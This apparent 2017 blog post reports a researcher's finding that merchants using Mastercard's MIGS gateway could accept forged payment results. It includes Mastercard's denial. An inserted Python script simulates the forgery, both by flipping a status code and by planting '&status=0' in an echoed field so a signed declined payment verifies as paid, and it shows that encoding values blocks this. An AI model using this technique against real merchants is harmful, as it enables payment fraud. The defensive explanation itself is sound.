SafeUM Blog
7 Sep 2017

Mastercard is ignoring a critical flaw that allows hackers to spoof valid payments

Vendors relying on Mastercard’s Internet Gateway Service (MIGS) for processing online payments ought to double-check every transaction before they send out items to customers. 

There is a critical flaw in the system’s validation protocol and it appears the company is completely ignoring it.

Independent security researcher Yohanes Nugroho has found a glaring flaw in the MIGS protocol that lets attackers spoof the payment system and trick merchants into accepting invalid transactions as successful, without the merchant noticing. “It can be said that this is a MIGS client bug, but the hashing method chosen by Mastercard allows this to happen,” the researcher explains. “Had the value been encoded, this bug would not be possible.” According to Nugroho’s findings, attackers can exploit this shortcoming to inject crafted values through third-party intermediate payment services, bypassing Mastercard’s system altogether and relaying a forged result straight to the vendor.

As the researcher observed, “instead of validating inputs on the merchant's server side before sending them to MIGS,” the requests are only checked on the client side. Since this data never reaches Mastercard’s servers in a form they can reject, it remains susceptible to spoofing.

This means that, if successful, attackers can pass off invalid payment transactions as legitimate proof of payment. Merchants still have to confirm the transaction, but most rarely check their bank accounts before approving an order, which is exactly why this loophole is so worrying.

Nugroho has been able to confirm that at least one payment gateway – Fusion Payments, a company valued at $20 million – was susceptible to this attack. Fusion Payments has since rewarded the researcher with a $500 bug bounty. They have also already implemented a filtering measure to prevent attackers from exploiting this hole.

This is what Nugroho said about Fusion’s implementation of MIGS:

Initially, they (Fusion) didn’t even check the signature from MIGS. That means we can just alter the data returned by MIGS and mark the transaction as successful. This just means changing a single character from F (false) to 0 (success[ful]).
So basically we can just enter any credit card number, get a failed response from MIGS, change it, and suddenly the payment is successful. After they fixed the bug, I discovered that they are vulnerable to the Mastercard hashing bug.
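The two bugs described above, the missing signature check at Fusion and the hash computed over unencoded values, belong to the same family: a merchant trusts a gateway response that it either does not authenticate at all, or authenticates over a string that can be split into fields in more than one way. The following script is an added illustration of that class, not code from the article, from Nugroho, from Fusion Payments or from MIGS. The field names (amount, order_info, status, txn_id), the shared secret, the HMAC-SHA256 choice and the assumption that a free-text field is echoed back by the gateway are all hypothetical; it does not reproduce the real MIGS parameter set or the researcher's exact steps.

```python
import hashlib
import hmac
from urllib.parse import parse_qsl, quote, urlencode

# Assumption: a secret shared between merchant and gateway. Not a real MIGS key,
# and the field names used below are illustrative, not the gateway's real ones.
SECRET = b"hypothetical-shared-secret"


def canon_unencoded(params):
    """Flawed canonicalisation: raw values joined with '&' and '='.
    A value that itself contains '&' or '=' makes the string ambiguous."""
    return "&".join(f"{k}={params[k]}" for k in sorted(params))


def canon_encoded(params):
    """Safe canonicalisation: percent-encode every key and value first, so an
    '&' or '=' inside a value can never be read as a separator."""
    return "&".join(
        f"{quote(k, safe='')}={quote(params[k], safe='')}" for k in sorted(params)
    )


def sign(params, canon):
    """HMAC-SHA256 over the canonical string (the 'hash' field itself is excluded)."""
    return hmac.new(SECRET, canon(params).encode(), hashlib.sha256).hexdigest()


def gateway_response(params, canon):
    """Gateway side: sign the fields and return them as a URL query string.
    urlencode() escapes '&' inside values, so the wire format is unambiguous;
    the ambiguity lives only in the string that gets signed."""
    signed = dict(params, hash=sign(params, canon))
    return urlencode(signed)


def merchant_outcome(query, canon, check_signature=True):
    """Merchant side: parse the returned query, verify the hash, read the status.
    Returns 'rejected' (bad hash), 'paid' (status 0) or 'failed' (anything else)."""
    fields = dict(parse_qsl(query, keep_blank_values=True))
    received = fields.pop("hash", "")
    if check_signature and not hmac.compare_digest(received, sign(fields, canon)):
        return "rejected"
    return "paid" if fields.get("status") == "0" else "failed"


# Constructed sample: a declined transaction as the gateway would report it.
FAILED = {"amount": "100", "order_info": "abc", "status": "F", "txn_id": "123"}


def flip_status(check_signature):
    """Bug 1 (no signature check): change the single character F -> 0 in the
    returned query. Caught as soon as the merchant verifies the hash."""
    query = gateway_response(FAILED, canon_unencoded)
    tampered = query.replace("status=F", "status=0")
    return merchant_outcome(tampered, canon_unencoded, check_signature)


def ambiguity_attack(canon):
    """Bug 2 (unencoded hash input): the attacker plants '&status=0&status_note='
    in a free-text field the gateway echoes back, obtains a genuinely signed
    declined response, then re-splits it so the identical signed string is
    parsed as status=0. The hash is untouched, so only encoding stops it."""
    crafted = dict(FAILED, order_info="abc&status=0&status_note=")
    echoed = dict(parse_qsl(gateway_response(crafted, canon), keep_blank_values=True))
    forged = {
        "amount": echoed["amount"],
        "order_info": "abc",
        "status": "0",
        "status_note": "&status=F",   # swallows the genuine status=F
        "txn_id": echoed["txn_id"],
        "hash": echoed["hash"],       # unchanged: the gateway really produced it
    }
    return merchant_outcome(urlencode(forged), canon)


if __name__ == "__main__":
    print("no signature check, F->0:", flip_status(False))                # paid
    print("signature check, F->0:   ", flip_status(True))                 # rejected
    print("unencoded hash, crafted: ", ambiguity_attack(canon_unencoded))  # paid
    print("encoded hash, crafted:   ", ambiguity_attack(canon_encoded))    # rejected
```

With canon_unencoded the merchant sorts the forged fields and rebuilds exactly the string the gateway signed ("...&status=0&status_note=&status=F&..."), so the HMAC verifies and the declined payment reads as paid; with canon_encoded the planted separators become %26 and %3D inside order_info, the two strings differ, and the forgery is rejected. The practical check for a merchant is therefore not just "do we verify the hash?" but "is every value encoded before it is hashed, on both sides?"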

Redditors claim that hackers are already exploiting the vulnerability in India, where MIGS is relatively widely used, but we haven’t been able to confirm this is indeed the case.

What is particularly worrying though is that the vulnerability can be exploited on practically any system reliant on MIGS, not just Fusion Payments. Still, Mastercard continues to ignore Nugroho’s warnings.

The researcher, who has previously reported a similar bug in the MIGS system and was rewarded $8,500 for it, told The Next Web that he reported the bug to Mastercard on August 17, but its representatives have yet to acknowledge the flaw. That is despite the fact that his password-protected disclosure post has been accessed by company employees at least three times so far.

In addition to his bug report, he also emailed some of the Mastercard security officers that processed his previous disclosure. He never heard back from them either. We have contacted Mastercard for more details and will update this post accordingly should we hear back.

Meanwhile, vendors had better stay on their toes: some seemingly valid payment requests might not be legitimate after all. Mastercard’s Senior Vice President of External Communications, Seth Eisen, had this to say:

We are aware of and have looked into the claims made by this researcher. While this specific claim does not exist within our system, we have identified a potential for a misconfiguration on merchants’ sites that could potentially affect how data is delivered. We are providing specific training and resources to the small number of merchants who could be impacted to minimize any exploitation of such an action.


Tags: Mastercard, information leaks, fraud, hackers
Source:
The Next Web